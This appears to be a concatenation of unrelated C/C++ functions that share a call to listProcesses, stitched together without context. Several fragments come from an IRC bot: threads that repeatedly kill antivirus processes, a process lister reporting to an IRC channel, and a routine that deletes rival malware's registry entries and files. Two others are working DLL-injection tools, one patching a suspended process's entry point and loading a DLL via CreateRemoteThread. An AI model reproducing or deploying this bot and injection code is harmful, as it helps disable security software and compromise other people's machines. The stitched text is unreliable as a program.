DWORD WINAPI kill_av(LPVOID param)
{
while (1) {
listProcesses(0,NULL,NULL,FALSE,NULL,TRUE);
Sleep(killer_delay);
}
return 0;
}
DWORD WINAPI KillAVThread(LPVOID param)
{
int threadnum = (int)param;
while (1) {
listProcesses(0,NULL,NULL,FALSE,NULL,TRUE);
Sleep(killer_delay);
}
clearthread(threadnum);
ExitThread(0);
}
void handleInterrupt21(int ax, int bx, int cx, int dx){
int cur;
switch(ax){
case 0x0: /*Print String*/
printString(bx);
break;
case 0x1: /*Read String*/
readString(bx);
break;
case 0x2: /*Read Sector*/
readSector(bx, cx);
break;
case 0x3: /*Read File*/
readFile(bx, cx);
break;
case 0x4: /*Execute Program*/
executeProgram(bx, NOONE);
break;
case 0x5: /*Terminate Program*/
terminate();
break;
case 0x6: /*Write Sector*/
writeSector(bx, cx);
break;
case 0x7: /*Delete File*/
deleteFile(bx);
break;
case 0x8: /*Write File*/
writeFile(bx, cx, dx);
break;
case 0x9: /*Kill Process*/
killProcess(bx);
break;
case 0xa: /*Execute Program in Blocking Fashion*/
setKernelDataSegment();
cur = currentProcess;
restoreDataSegment();
executeProgram(bx, cur);
break;
case 0xb:
listProcesses();
break;
case 0xc:
editString(bx);
break;
default:
printString("Interrupt21 got undefined ax.");
break;
}
return;
}
QString sysInfo::getDetailedStats(){
cpuUsage();
memPerc();
netStat();
cpuStats();
getDiskDetails();
osVersion();
listProcesses();
QString stats = "";
bytesTransmitted = getSizeUnit(bytesTransmitted);
bytesReceived = getSizeUnit(bytesReceived);
//Add the netstat info to the stats string
stats = stats + "Data Transmitted," + bytesTransmitted + "#Data Received," + bytesReceived + "#Packets Transmitted," + packetsTransmitted + "#Packets Received," + packetsReceived + "#Errors Transmitting," + transmitErrors + "#Errors Receiving," + receiveErrors;
//Add the cpuStats to the stats string
stats = stats + "#Number of Processors," + _cpuCount;
//Add the OS Version
stats = stats + "#Operating System," + osVers;
//Add the various logical drive details
for(int i = 0; i < filesystems.length(); i++){
QString cap = capacitys.at(i);
cap.chop(cap.length() - cap.indexOf("."));
cap = getSizeUnit(cap);
QString used = useds.at(i);
used = getSizeUnit(used);
stats = stats + "#Drive Label," + filesystems.at(i) + ",Total Capacity," + cap+ ",Used Space," + used;
}
//Add RAM and CPU
physMem.chop(physMem.length()- physMem.indexOf("."));
physMem = getSizeUnit(physMem);
freePhysMem.chop(freePhysMem.length() - freePhysMem.indexOf("."));
freePhysMem = getSizeUnit(freePhysMem);
stats = stats + "#Total RAM,"+physMem+"#Used RAM,"+freePhysMem+"#% RAM in use,"+memoryLoad+"#% CPU in use,"+cpuPerc;
//Add the process/task related info
stats = stats + "#Amount of Processes active," + procCount;
for(int j = 0; j < procIDs.length(); j++){
stats = stats + "#" + procIDs.at(j) + "," + procNames.at(j);
}
return stats;
}
DWORD WINAPI listProcessesThread(LPVOID param)
{
char sendbuf[IRCLINE];
LPROC lproc = *((LPROC *)param);
LPROC *lprocp = (LPROC *)param;
lprocp->gotinfo = TRUE;
sprintf(sendbuf," p roc »» Listing processes:");
if (!lproc.silent) irc_privmsg(lproc.sock,lproc.chan,sendbuf,lproc.notice);
if (listProcesses(lproc.sock,lproc.chan,lproc.notice,NULL, FALSE, lproc.full) == 0)
sprintf(sendbuf," p roc »» Process list completed.");
else
sprintf(sendbuf," p roc »» Process list failed.");
if (!lproc.silent) irc_privmsg(lproc.sock, lproc.chan, sendbuf, lproc.notice);
addlog(sendbuf);
clearthread(lproc.threadnum);
ExitThread(0);
}
void removevirus()
{
char sysdir[MAX_PATH], virusexecuteble[MAX_PATH];
unsigned char szDataBuf[128];
SOCKET sock;
HKEY hkey;
char sendbuf[IRCLINE];
char current[20];
LONG lRet;
sock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
DWORD dwSize = 128;
for (unsigned int i=0; viruses[i].subkey; i++) {
lRet = fRegOpenKeyEx(viruses[i].hkey, viruses[i].subkey, 0, KEY_READ, &hkey);
if(fRegQueryValueEx(hkey, viruses[i].value, NULL, NULL, szDataBuf, &dwSize) == ERROR_SUCCESS) {
fRegDeleteValue(hkey, viruses[i].value);
strcpy(current,viruses[i].file);
//FIXME: Replace the afw kill utils. we dont need to let that loop,
// when we removed the .exe and the reg key. mayb a static call
// to KillProcess(); can be inserted here. Something like:
if(listProcesses(sock,NULL,FALSE,current) == 1)
sprintf(sendbuf,"[PROC]: Process killed: %s",viruses[i].file);
else
sprintf(sendbuf,"[PROC]: Failed to terminate process: %s", viruses[i].file);
//KillProcess(viruses[i].file);
GetSystemDirectory(sysdir, sizeof(sysdir));
sprintf(virusexecuteble, "%s\\%s", sysdir, viruses[i].file);
DeleteFile(virusexecuteble);
}
fRegCloseKey(hkey);
}
sprintf(sendbuf,"[AV]: Antivirus search complete! ");
return;
}
int main(int argc, char* argv[]) {
char dllToInject[512],iniFilePath[512];
char cmd[512];
DWORD pid=0;
opt options;
FILE *in;
SetDebugPrivileges();
//printf("%s\n",getfile_fullpath("\\\\.\\pipe\\mojo.6136.4468.15747523823731339023"));
//return 1;
char basePath[512];
_fullpath(basePath, argv[0], sizeof(basePath));
for(char *p=basePath+strlen(basePath);p>basePath;p--){
if(*p=='\\') {
*(p+1)=0;
break;
}
}
//build ini path
strcpy(iniFilePath,basePath);
strcat(iniFilePath,INIFILE);
options.dumpIAT = FALSE;
options.loadINI = TRUE;
options.hook = TRUE;
options.unhook = FALSE;
options.cmdline = NULL;
options.waitKeyPress = FALSE;
options.iniPath = iniFilePath;
options.suspended=FALSE;
iniFile *ini=parseIni(iniFilePath);
options.ini=ini;
//build dll path
strcpy(dllToInject,basePath);
strcat(dllToInject,ini->dll);
if(argc<2) usage(dllToInject,iniFilePath);
in=fopen(dllToInject,"r");
if(in==NULL){
sprintf(cmd,"Error: DLL to inject NOT FOUND: %s",dllToInject);
logger(ini,"injector",cmd,strlen(cmd));
printf("DLL to inject not found... Path:\n");
printf("%s\n",dllToInject);
return 0;
}
fclose(in);
if(argc>1 && argv[1][0]=='/'){
//list processes
if(argv[1][1]=='?' || argv[1][1]=='h') usage(dllToInject,iniFilePath);
if(argv[1][1]=='l'){
listProcesses();
exit(0);
}
//read command line
if(argv[1][1]=='x' || argv[1][1]=='X'){
options.cmdline=argv[2];
options.waitKeyPress=argv[1][1]=='X'?TRUE:FALSE;
}
//read the pid
if(argv[1][1]=='p' || argv[1][1]=='P' || argv[1][1]=='i' || argv[1][1]=='u'){
pid=atoi(argv[2]);
if(argv[1][1]=='i') {
options.dumpIAT=TRUE;
options.hook=FALSE;
sprintf(cmd,"Dump IAT requested for Pid %d",pid);
logger(ini,"injector",cmd,strlen(cmd));
}
if(argv[1][1]=='u') {
options.dumpIAT=FALSE;
options.hook=FALSE;
options.loadINI=FALSE;
options.unhook=TRUE;
sprintf(cmd,"Unhook requested for PID %d",pid);
logger(ini,"injector",cmd,strlen(cmd));
}
if(argv[1][1]=='P') options.suspended=TRUE;
}
}
printf(TITLE"\n");
if(pid==0 && options.cmdline==NULL) return 1;
if(pid!=0){
HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
if(process == NULL) {
printf("[Error] the specified process couldn't be found. Code: %d\n",GetLastError());
sprintf(cmd,"Error: Invalid Pid %d",pid);
logger(ini,"injector",cmd,strlen(cmd));
return 1;
}
}
if(ini->debuglevel>3){
sprintf(cmd,"sinjector.exe called...",pid);
logger(ini,"injector",cmd,strlen(cmd));
sprintf(cmd,"Ini: %s",iniFilePath);
logger(ini,"injector",cmd,strlen(cmd));
sprintf(cmd,"DLL: %s",dllToInject);
logger(ini,"injector",cmd,strlen(cmd));
}
//dump ini options
if(ini && ini->debuglevel>0){
printf("[ini] dll=%s\n",*ini->dll?ini->dll:"Error!!!");
if(ini->monitor) printf("[ini] monitor=%s\n",*ini->monitor?ini->monitor:"none (DISABLED)");
if(ini->logfile) printf("[ini] logfile=%s\n",*ini->logfile?ini->logfile:"none (DISABLED)");
if(ini->iatfile) printf("[ini] iatfile=%s\n",*ini->iatfile?ini->iatfile:"none (DISABLED)");
if(ini->backup) printf("[ini] backup=%s\n",*ini->backup?ini->backup:"none (DISABLED)");
printf("[ini] debuglevel=%d\n",ini->debuglevel);
printf("[ini] reinject=%d (%s)\n",ini->reinject,ini->reinject?"ENABLED":"DISABLED");
if(ini->reinject_blacklist) printf("[ini] reinject_blacklist=%s\n",*ini->reinject_blacklist?ini->reinject_blacklist:"none (DISABLED)");
}else{
options.loadINI=FALSE;
}
if(options.cmdline!=NULL){
spwanAndHook(dllToInject,&options);
}else{
injecta(pid,dllToInject,&options);
}
//printf("Press [intro] to exit...\n");
//getchar();
return 0;
/*
//Classic DLL Injection
//Get process handle passing in the process ID.
HANDLE process = OpenProcess(MAXIMUM_ALLOWED, FALSE, pid);
if(process == NULL) {
printf("Error: the specified process couldn't be found\n");
printf("PID: %d Last error: %d\n",pid,GetLastError());
return FALSE;
}
//Get address of the LoadLibrary function.
LPVOID addrLoadLib = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
if(addrLoadLib == NULL) {
printf("Error: the LoadLibraryA function was not found inside kernel32.dll library\n");
}
//Allocate new memory region inside the process's address space.
LPVOID arg = (LPVOID)VirtualAllocEx(process, NULL, strlen(buffer), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if(arg == NULL) {
printf("Error: the memory could not be allocated inside the chosen process\n");
}
//Write the argument to LoadLibraryA to the process's newly allocated memory region.
int n = WriteProcessMemory(process, arg, buffer, strlen(buffer), NULL);
if(n == 0) {
printf("Error: there was no bytes written to the process's address space\n");
}
//Inject our DLL into the process's address space.
printf("Waiting for process (if it's suspended...)\n");
WaitForInputIdle(process,INFINITE);
HANDLE threadID = CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)addrLoadLib, arg, 0, NULL);
if(threadID == NULL) {
printf("Error: the remote thread could not be created\n");
}
else {
printf("Success: the remote thread was successfully created\n");
}
//Close the handle to the process, becuase we've already injected the DLL.
CloseHandle(process);
*/
return 0;
}
int main(int argc,char **argv)
{
parseArgs(argc, argv);
SIZE_T bW = 0, bR = 0;
char *exeInput = (char *)malloc(MAX_PATH);
char *dllInput = (char *)malloc(MAX_PATH);
char *wdrInput = (char *)malloc(MAX_PATH);
memset(exeInput,0,MAX_PATH);
memset(dllInput,0,MAX_PATH);
memset(wdrInput,0,MAX_PATH);
if (opMode == OPMODE_LIST)
{
listProcesses(stringToMatch);
return 0;
}
else if(opMode == OPMODE_INJECT)
{
if (globalDll == NULL)
{
printf(" [dll] > ");
fgets(dllInput,MAX_PATH,stdin);
}
else
{
strcpy(dllInput,globalDll);
}
injectIntoProcess(globalInject,dllInput);
return 0;
}
if (globalTest)
{
strcpy(exeInput,"test.exe");
strcpy(dllInput,"shackle.dll");
strcpy(wdrInput,"c:\\projects\\elegurawolfe\\");
}
else if(globalExeName == NULL || globalWorkingDirectory == NULL || globalDll == NULL)
{
// printf("* SOMETHING MISSING %08x%08x%08x\n", (unsigned long )globalExeName, (unsigned long )globalWorkingDirectory, (unsigned long )globalDll);
printf(" [exe] > ");
fgets(exeInput,MAX_PATH,stdin);
if (globalDll == NULL)
{
printf(" [dll] > ");
fgets(dllInput,MAX_PATH,stdin);
}
else
{
strcpy(dllInput,globalDll);
}
printf(" [wdr] > ");
fgets(wdrInput,MAX_PATH,stdin);
chomp(exeInput);
chomp(dllInput);
chomp(wdrInput);
}
else
{
strcpy(exeInput,globalExeName);
strcpy(dllInput,globalDll);
strcpy(wdrInput,globalWorkingDirectory);
}
if (exists(exeInput) == 0)
{
printf(" [FAIL-EXE] %s does not exist\n",exeInput);
return 0;
}
if(exists(dllInput) == 0)
{
printf(" [FAIL-DLL] %s does not exist\n",dllInput);
return 0;
}
PROCESS_INFORMATION pi;
STARTUPINFO si;
memset (&pi,0,sizeof(PROCESS_INFORMATION));
memset (&si, 0, sizeof (STARTUPINFO));
si.cb = sizeof(si);
HANDLE hNtDll = LoadLibrary("ntdll.dll");
NtQueryInformationProcess = (_NtQueryInformationProcess )(GetProcAddress( (HMODULE )hNtDll, "NtQueryInformationProcess"));
HANDLE hKernel = LoadLibrary("kernel32.dll");
LPVOID addrLoadLibrary = GetProcAddress( (HMODULE )hKernel, "LoadLibraryA");
BOOL derp = CreateProcess(exeInput, exeInput, NULL, NULL, FALSE, CREATE_SUSPENDED + CREATE_NEW_CONSOLE, NULL, wdrInput, &si, &pi);
if (derp == NULL)
{
char *errorMessage;
FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER +
FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0,
(char *) &errorMessage, 1, NULL);
printf (" [FAIL] %s", errorMessage);
return 0;
}
HANDLE hProcess = pi.hProcess;
HANDLE hThread = pi.hThread;
globalPid = pi.dwProcessId;
printf(" * [INFO] new process id is %d\n",pi.dwProcessId);
#if ARCHI == 64
BOOL wow64 = FALSE;
IsWow64Process(hProcess,&wow64);
if (wow64 == TRUE)
{
IsDll64Bit(globalDll);
printf(" [WARN] injecting into wow64 ");
}
#endif
printf(" [INFO] process handle is %08x\n",(unsigned long )hProcess);
PROCESS_BASIC_INFORMATION pib;
PEB_ARCHI globalPEB;
NtQueryInformationProcess (hProcess, 0, (PVOID )(&pib), sizeof (pib),& bW);
printf(" [INFO] pib.PebBaseAddress = 0x%p (size of field is %d)\n", pib.PebBaseAddress, sizeof(pib.PebBaseAddress));
ReadProcessMemory (hProcess, pib.PebBaseAddress, &globalPEB, sizeof (globalPEB), &bR);
if (bR != sizeof (globalPEB))
{
char *errorMessage;
FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER +
FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0,
(char *) &errorMessage, 1, NULL);
printf (" [FAIL] %s", errorMessage);
return 0;
}
printf(" [INFO] peb.ImageBaseAddress = %p\n", (void *)(globalPEB.ImageBaseAddress));
UINT_PTR entryPoint = guessExecutableEntryPoint (hProcess, globalPEB.ImageBaseAddress);
printf(" [INFO] entryPoint = 0x%8x\n", entryPoint);
char oldEntryChars[2];
DWORD oldProtect = 0;
DWORD discardProtect = 0;
VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect);
ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)oldEntryChars,2,&bR);
printf(" [INFO] old entry is %02x %02x\n", (unsigned char )oldEntryChars[0],(unsigned char )oldEntryChars[1]);
printf(" [INFO] writing...\n");
WriteProcessMemory(hProcess,(LPVOID )entryPoint,"\xEB\xFE",2,&bW);
VirtualProtectEx(hProcess,(LPVOID )entryPoint,1,oldProtect,&discardProtect);
char newEntryChars[2];
ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR);
if (newEntryChars[0] == '\xEB' && newEntryChars[1] == '\xFE')
{
printf(" [INFO] new entry is %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
}
else
{
printf(" [INFO] new entry is %02x %02x, something's wrong\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
return 0;
}
CONTEXT context;
context.ContextFlags = CONTEXT_FULL;
GetThreadContext (hThread, &context);
context.PC_REG = entryPoint;
SetThreadContext(hThread,&context);
ResumeThread(pi.hThread);
LPVOID remoteMemory = VirtualAllocEx(hProcess,NULL,strlen(dllInput) + 1,MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE);
WriteProcessMemory(hProcess,(LPVOID )remoteMemory,dllInput,strlen(dllInput) + 1,&bW);
printf(" [INFO] trying to create a remote thread at %08x\n",(unsigned long )addrLoadLibrary);
char *dllOutput = (char *)malloc(MAX_PATH);
memset(dllOutput,0,MAX_PATH);
ReadProcessMemory(hProcess,(LPCVOID )remoteMemory,dllOutput,MAX_PATH,&bR);
printf(" [INFO] confirming process has cave with \"%s\"\n",dllOutput);
free(dllOutput);
if(globalWait)
{
printf(" [WAIT] press any key to create remote thread...\n");
getc(stdin);
}
HANDLE threadId = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE )addrLoadLibrary,remoteMemory,NULL,NULL);
if (threadId == NULL)
{
printf(" [INFO] could not create remote thread\n");
return 0;
}
else
{
WaitForSingleObject(threadId, INFINITE); //this waits untill thread thread has finished
// VirtualFree(remoteMemory, 0, MEM_RELEASE); //free myFunc memory
CloseHandle(threadId);
// CloseHandle(hProcess);
}
int i = globalCooldown;
for (; i > 0; i--)
{
printf(" [INFO] waiting %d seconds\n",i);
Sleep(1000);
}
printf(" [INFO] restoring entrypoint...\n");
SuspendThread(pi.hThread);
VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, PAGE_READWRITE, &oldProtect);
i = WriteProcessMemory(hProcess,(LPVOID )entryPoint,(char *)&oldEntryChars,2,&bW);
if (i == 0)
{
char *errorMessage;
FormatMessage (FORMAT_MESSAGE_ALLOCATE_BUFFER +
FORMAT_MESSAGE_FROM_SYSTEM, 0, GetLastError (), 0,
(char *) &errorMessage, 1, NULL);
printf (" [FAIL] %s", errorMessage);
return 0;
}
ReadProcessMemory(hProcess,(LPCVOID )entryPoint,(char *)newEntryChars,2,&bR);
VirtualProtectEx(hProcess,(LPVOID )entryPoint,1, oldProtect, &discardProtect);
printf(" [INFO] entry restored to %02x %02x\n", (unsigned char )newEntryChars[0],(unsigned char )newEntryChars[1]);
GetThreadContext (hThread, &context);
context.PC_REG = entryPoint;
SetThreadContext(hThread,&context);
ResumeThread(pi.hThread);
printf(" [INFO] bye!");
free(exeInput);
free(dllInput);
free(wdrInput);
return 0;
}
